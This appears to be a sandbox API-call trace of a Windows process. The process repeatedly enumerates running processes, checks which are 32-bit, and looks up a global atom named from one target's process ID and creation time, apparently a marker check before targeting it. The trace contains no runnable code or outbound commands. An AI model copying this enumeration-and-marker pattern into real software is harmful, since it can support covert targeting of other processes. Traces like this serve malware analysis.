	[0079.697] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0079.697] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.697] CloseHandle (hObject=0x224) returned 1
	[0079.697] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0079.697] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.697] CloseHandle (hObject=0x224) returned 1
	[0079.697] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0079.697] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.697] CloseHandle (hObject=0x224) returned 1
	[0079.697] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0079.697] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.697] CloseHandle (hObject=0x224) returned 1
	[0079.697] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0079.697] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0079.698] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0079.698] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0079.698] wsprintfA (in: param_1=0x710e08, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0079.698] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0079.698] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0079.698] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0079.699] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0079.699] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0079.699] CloseHandle (hObject=0x224) returned 1
	[0079.699] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0079.699] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0079.699] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0079.699] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.699] CloseHandle (hObject=0x224) returned 1
	[0079.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0079.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0079.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0079.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0079.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0079.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0079.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0079.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0079.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0079.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0079.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0079.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0079.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0079.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0079.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0079.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0079.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0079.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0079.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0079.775] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.775] CloseHandle (hObject=0x224) returned 1
	[0079.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0079.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0079.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0079.775] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.775] CloseHandle (hObject=0x224) returned 1
	[0079.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0079.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0079.776] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.776] CloseHandle (hObject=0x224) returned 1
	[0079.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0079.776] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.776] CloseHandle (hObject=0x224) returned 1
	[0079.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0079.776] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.776] CloseHandle (hObject=0x224) returned 1
	[0079.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0079.776] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.776] CloseHandle (hObject=0x224) returned 1
	[0079.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0079.776] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.776] CloseHandle (hObject=0x224) returned 1
	[0079.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0079.776] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.776] CloseHandle (hObject=0x224) returned 1
	[0079.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0079.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0079.777] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.777] CloseHandle (hObject=0x224) returned 1
	[0079.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0079.777] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.777] CloseHandle (hObject=0x224) returned 1
	[0079.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0079.777] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.777] CloseHandle (hObject=0x224) returned 1
	[0079.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0079.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0079.777] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.777] CloseHandle (hObject=0x224) returned 1
	[0079.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0079.777] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.777] CloseHandle (hObject=0x224) returned 1
	[0079.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0079.777] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.778] CloseHandle (hObject=0x224) returned 1
	[0079.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0079.778] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.778] CloseHandle (hObject=0x224) returned 1
	[0079.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0079.778] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.778] CloseHandle (hObject=0x224) returned 1
	[0079.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0079.778] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.778] CloseHandle (hObject=0x224) returned 1
	[0079.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0079.778] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.778] CloseHandle (hObject=0x224) returned 1
	[0079.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0079.778] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.778] CloseHandle (hObject=0x224) returned 1
	[0079.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0079.779] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.779] CloseHandle (hObject=0x224) returned 1
	[0079.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0079.779] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.779] CloseHandle (hObject=0x224) returned 1
	[0079.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0079.779] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.779] CloseHandle (hObject=0x224) returned 1
	[0079.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0079.779] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.779] CloseHandle (hObject=0x224) returned 1
	[0079.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0079.779] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.779] CloseHandle (hObject=0x224) returned 1
	[0079.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0079.779] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.779] CloseHandle (hObject=0x224) returned 1
	[0079.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0079.779] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.779] CloseHandle (hObject=0x224) returned 1
	[0079.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0079.780] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.780] CloseHandle (hObject=0x224) returned 1
	[0079.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0079.780] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.780] CloseHandle (hObject=0x224) returned 1
	[0079.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0079.780] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.780] CloseHandle (hObject=0x224) returned 1
	[0079.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0079.780] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.780] CloseHandle (hObject=0x224) returned 1
	[0079.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0079.780] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.780] CloseHandle (hObject=0x224) returned 1
	[0079.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0079.781] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0079.781] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0079.781] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0079.781] wsprintfA (in: param_1=0x710e08, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0079.781] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0079.781] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0079.781] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0079.782] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0079.782] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0079.782] CloseHandle (hObject=0x224) returned 1
	[0079.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0079.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0079.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0079.782] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.782] CloseHandle (hObject=0x224) returned 1
	[0079.854] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0079.854] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0079.854] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0079.854] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0079.855] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0079.855] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0079.855] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0079.855] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0079.855] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0079.855] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0079.855] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0079.855] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0079.855] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0079.855] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0079.856] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0079.856] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0079.856] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0079.856] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0079.856] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0079.856] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.856] CloseHandle (hObject=0x224) returned 1
	[0079.856] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0079.856] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0079.856] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0079.856] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.856] CloseHandle (hObject=0x224) returned 1
	[0079.856] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0079.856] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0079.856] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.857] CloseHandle (hObject=0x224) returned 1
	[0079.857] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0079.857] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.857] CloseHandle (hObject=0x224) returned 1
	[0079.857] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0079.857] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.857] CloseHandle (hObject=0x224) returned 1
	[0079.857] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0079.857] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.857] CloseHandle (hObject=0x224) returned 1
	[0079.857] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0079.857] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.857] CloseHandle (hObject=0x224) returned 1
	[0079.857] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0079.857] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.857] CloseHandle (hObject=0x224) returned 1
	[0079.857] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0079.857] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0079.858] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.858] CloseHandle (hObject=0x224) returned 1
	[0079.858] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0079.858] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.858] CloseHandle (hObject=0x224) returned 1
	[0079.858] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0079.858] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.858] CloseHandle (hObject=0x224) returned 1
	[0079.858] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0079.858] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0079.858] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.858] CloseHandle (hObject=0x224) returned 1
	[0079.858] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0079.858] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.858] CloseHandle (hObject=0x224) returned 1
	[0079.858] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0079.858] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.858] CloseHandle (hObject=0x224) returned 1
	[0079.858] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0079.858] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.859] CloseHandle (hObject=0x224) returned 1
	[0079.859] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0079.859] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.859] CloseHandle (hObject=0x224) returned 1
	[0079.859] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0079.859] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.859] CloseHandle (hObject=0x224) returned 1
	[0079.859] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0079.859] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.859] CloseHandle (hObject=0x224) returned 1
	[0079.859] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0079.859] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.859] CloseHandle (hObject=0x224) returned 1
	[0079.859] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0079.859] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.859] CloseHandle (hObject=0x224) returned 1
	[0079.859] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0079.859] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.859] CloseHandle (hObject=0x224) returned 1
	[0079.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0079.860] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.860] CloseHandle (hObject=0x224) returned 1
	[0079.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0079.860] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.860] CloseHandle (hObject=0x224) returned 1
	[0079.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0079.860] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.860] CloseHandle (hObject=0x224) returned 1
	[0079.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0079.860] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.860] CloseHandle (hObject=0x224) returned 1
	[0079.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0079.860] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.860] CloseHandle (hObject=0x224) returned 1
	[0079.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0079.860] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.860] CloseHandle (hObject=0x224) returned 1
	[0079.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0079.860] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.860] CloseHandle (hObject=0x224) returned 1
	[0079.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0079.861] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.861] CloseHandle (hObject=0x224) returned 1
	[0079.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0079.861] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.861] CloseHandle (hObject=0x224) returned 1
	[0079.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0079.861] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.861] CloseHandle (hObject=0x224) returned 1
	[0079.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0079.861] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0079.861] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0079.861] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0079.861] wsprintfA (in: param_1=0x710e08, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0079.862] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0079.862] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0079.862] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0079.862] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0079.862] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0079.862] CloseHandle (hObject=0x224) returned 1
	[0079.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0079.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0079.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0079.862] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.862] CloseHandle (hObject=0x224) returned 1
	[0079.939] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
